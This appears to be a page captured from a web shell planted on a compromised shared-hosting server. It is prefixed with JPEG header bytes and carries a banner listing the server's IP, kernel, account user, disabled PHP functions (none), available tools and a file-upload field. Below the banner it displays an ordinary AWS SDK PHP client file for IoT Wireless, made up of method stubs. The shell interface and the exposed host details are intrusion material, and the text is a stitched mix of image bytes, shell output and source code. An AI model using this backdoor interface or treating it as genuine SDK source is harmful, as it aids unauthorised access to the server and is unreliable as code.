����JFIF��x�x����'
Server IP : 78.140.185.180 / Your IP : 216.73.216.82 Web Server : LiteSpeed System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : builderbox ( 1072) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/builderbox/public_html/vendor/aws/aws-sdk-php/src/IoTWireless/ |
Upload File : |
<?php namespace Aws\IoTWireless; use Aws\AwsClient; /** * This client is used to interact with the **AWS IoT Wireless** service. * @method \Aws\Result associateAwsAccountWithPartnerAccount(array $args = []) * @method \GuzzleHttp\Promise\Promise associateAwsAccountWithPartnerAccountAsync(array $args = []) * @method \Aws\Result associateWirelessDeviceWithThing(array $args = []) * @method \GuzzleHttp\Promise\Promise associateWirelessDeviceWithThingAsync(array $args = []) * @method \Aws\Result associateWirelessGatewayWithCertificate(array $args = []) * @method \GuzzleHttp\Promise\Promise associateWirelessGatewayWithCertificateAsync(array $args = []) * @method \Aws\Result associateWirelessGatewayWithThing(array $args = []) * @method \GuzzleHttp\Promise\Promise associateWirelessGatewayWithThingAsync(array $args = []) * @method \Aws\Result createDestination(array $args = []) * @method \GuzzleHttp\Promise\Promise createDestinationAsync(array $args = []) * @method \Aws\Result createDeviceProfile(array $args = []) * @method \GuzzleHttp\Promise\Promise createDeviceProfileAsync(array $args = []) * @method \Aws\Result createServiceProfile(array $args = []) * @method \GuzzleHttp\Promise\Promise createServiceProfileAsync(array $args = []) * @method \Aws\Result createWirelessDevice(array $args = []) * @method \GuzzleHttp\Promise\Promise createWirelessDeviceAsync(array $args = []) * @method \Aws\Result createWirelessGateway(array $args = []) * @method \GuzzleHttp\Promise\Promise createWirelessGatewayAsync(array $args = []) * @method \Aws\Result createWirelessGatewayTask(array $args = []) * @method \GuzzleHttp\Promise\Promise createWirelessGatewayTaskAsync(array $args = []) * @method \Aws\Result createWirelessGatewayTaskDefinition(array $args = []) * @method \GuzzleHttp\Promise\Promise createWirelessGatewayTaskDefinitionAsync(array $args = []) * @method \Aws\Result deleteDestination(array $args = []) * @method \GuzzleHttp\Promise\Promise deleteDestinationAsync(array $args = []) * @method \Aws\Result deleteDeviceProfile(array $args = []) * @method \GuzzleHttp\Promise\Promise deleteDeviceProfileAsync(array $args = []) * @method \Aws\Result deleteServiceProfile(array $args = []) * @method \GuzzleHttp\Promise\Promise deleteServiceProfileAsync(array $args = []) * @method \Aws\Result deleteWirelessDevice(array $args = []) * @method \GuzzleHttp\Promise\Promise deleteWirelessDeviceAsync(array $args = []) * @method \Aws\Result deleteWirelessGateway(array $args = []) * @method \GuzzleHttp\Promise\Promise deleteWirelessGatewayAsync(array $args = []) * @method \Aws\Result deleteWirelessGatewayTask(array $args = []) * @method \GuzzleHttp\Promise\Promise deleteWirelessGatewayTaskAsync(array $args = []) * @method \Aws\Result deleteWirelessGatewayTaskDefinition(array $args = []) * @method \GuzzleHttp\Promise\Promise deleteWirelessGatewayTaskDefinitionAsync(array $args = []) * @method \Aws\Result disassociateAwsAccountFromPartnerAccount(array $args = []) * @method \GuzzleHttp\Promise\Promise disassociateAwsAccountFromPartnerAccountAsync(array $args = []) * @method \Aws\Result disassociateWirelessDeviceFromThing(array $args = []) * @method \GuzzleHttp\Promise\Promise disassociateWirelessDeviceFromThingAsync(array $args = []) * @method \Aws\Result disassociateWirelessGatewayFromCertificate(array $args = []) * @method \GuzzleHttp\Promise\Promise disassociateWirelessGatewayFromCertificateAsync(array $args = []) * @method \Aws\Result disassociateWirelessGatewayFromThing(array $args = []) * @method \GuzzleHttp\Promise\Promise disassociateWirelessGatewayFromThingAsync(array $args = []) * @method \Aws\Result getDestination(array $args = []) * @method \GuzzleHttp\Promise\Promise getDestinationAsync(array $args = []) * @method \Aws\Result getDeviceProfile(array $args = []) * @method \GuzzleHttp\Promise\Promise getDeviceProfileAsync(array $args = []) * @method \Aws\Result getLogLevelsByResourceTypes(array $args = []) * @method \GuzzleHttp\Promise\Promise getLogLevelsByResourceTypesAsync(array $args = []) * @method \Aws\Result getPartnerAccount(array $args = []) * @method \GuzzleHttp\Promise\Promise getPartnerAccountAsync(array $args = []) * @method \Aws\Result getResourceLogLevel(array $args = []) * @method \GuzzleHttp\Promise\Promise getResourceLogLevelAsync(array $args = []) * @method \Aws\Result getServiceEndpoint(array $args = []) * @method \GuzzleHttp\Promise\Promise getServiceEndpointAsync(array $args = []) * @method \Aws\Result getServiceProfile(array $args = []) * @method \GuzzleHttp\Promise\Promise getServiceProfileAsync(array $args = []) * @method \Aws\Result getWirelessDevice(array $args = []) * @method \GuzzleHttp\Promise\Promise getWirelessDeviceAsync(array $args = []) * @method \Aws\Result getWirelessDeviceStatistics(array $args = []) * @method \GuzzleHttp\Promise\Promise getWirelessDeviceStatisticsAsync(array $args = []) * @method \Aws\Result getWirelessGateway(array $args = []) * @method \GuzzleHttp\Promise\Promise getWirelessGatewayAsync(array $args = []) * @method \Aws\Result getWirelessGatewayCertificate(array $args = []) * @method \GuzzleHttp\Promise\Promise getWirelessGatewayCertificateAsync(array $args = []) * @method \Aws\Result getWirelessGatewayFirmwareInformation(array $args = []) * @method \GuzzleHttp\Promise\Promise getWirelessGatewayFirmwareInformationAsync(array $args = []) * @method \Aws\Result getWirelessGatewayStatistics(array $args = []) * @method \GuzzleHttp\Promise\Promise getWirelessGatewayStatisticsAsync(array $args = []) * @method \Aws\Result getWirelessGatewayTask(array $args = []) * @method \GuzzleHttp\Promise\Promise getWirelessGatewayTaskAsync(array $args = []) * @method \Aws\Result getWirelessGatewayTaskDefinition(array $args = []) * @method \GuzzleHttp\Promise\Promise getWirelessGatewayTaskDefinitionAsync(array $args = []) * @method \Aws\Result listDestinations(array $args = []) * @method \GuzzleHttp\Promise\Promise listDestinationsAsync(array $args = []) * @method \Aws\Result listDeviceProfiles(array $args = []) * @method \GuzzleHttp\Promise\Promise listDeviceProfilesAsync(array $args = []) * @method \Aws\Result listPartnerAccounts(array $args = []) * @method \GuzzleHttp\Promise\Promise listPartnerAccountsAsync(array $args = []) * @method \Aws\Result listServiceProfiles(array $args = []) * @method \GuzzleHttp\Promise\Promise listServiceProfilesAsync(array $args = []) * @method \Aws\Result listTagsForResource(array $args = []) * @method \GuzzleHttp\Promise\Promise listTagsForResourceAsync(array $args = []) * @method \Aws\Result listWirelessDevices(array $args = []) * @method \GuzzleHttp\Promise\Promise listWirelessDevicesAsync(array $args = []) * @method \Aws\Result listWirelessGatewayTaskDefinitions(array $args = []) * @method \GuzzleHttp\Promise\Promise listWirelessGatewayTaskDefinitionsAsync(array $args = []) * @method \Aws\Result listWirelessGateways(array $args = []) * @method \GuzzleHttp\Promise\Promise listWirelessGatewaysAsync(array $args = []) * @method \Aws\Result putResourceLogLevel(array $args = []) * @method \GuzzleHttp\Promise\Promise putResourceLogLevelAsync(array $args = []) * @method \Aws\Result resetAllResourceLogLevels(array $args = []) * @method \GuzzleHttp\Promise\Promise resetAllResourceLogLevelsAsync(array $args = []) * @method \Aws\Result resetResourceLogLevel(array $args = []) * @method \GuzzleHttp\Promise\Promise resetResourceLogLevelAsync(array $args = []) * @method \Aws\Result sendDataToWirelessDevice(array $args = []) * @method \GuzzleHttp\Promise\Promise sendDataToWirelessDeviceAsync(array $args = []) * @method \Aws\Result tagResource(array $args = []) * @method \GuzzleHttp\Promise\Promise tagResourceAsync(array $args = []) * @method \Aws\Result testWirelessDevice(array $args = []) * @method \GuzzleHttp\Promise\Promise testWirelessDeviceAsync(array $args = []) * @method \Aws\Result untagResource(array $args = []) * @method \GuzzleHttp\Promise\Promise untagResourceAsync(array $args = []) * @method \Aws\Result updateDestination(array $args = []) * @method \GuzzleHttp\Promise\Promise updateDestinationAsync(array $args = []) * @method \Aws\Result updateLogLevelsByResourceTypes(array $args = []) * @method \GuzzleHttp\Promise\Promise updateLogLevelsByResourceTypesAsync(array $args = []) * @method \Aws\Result updatePartnerAccount(array $args = []) * @method \GuzzleHttp\Promise\Promise updatePartnerAccountAsync(array $args = []) * @method \Aws\Result updateWirelessDevice(array $args = []) * @method \GuzzleHttp\Promise\Promise updateWirelessDeviceAsync(array $args = []) * @method \Aws\Result updateWirelessGateway(array $args = []) * @method \GuzzleHttp\Promise\Promise updateWirelessGatewayAsync(array $args = []) */ class IoTWirelessClient extends AwsClient {}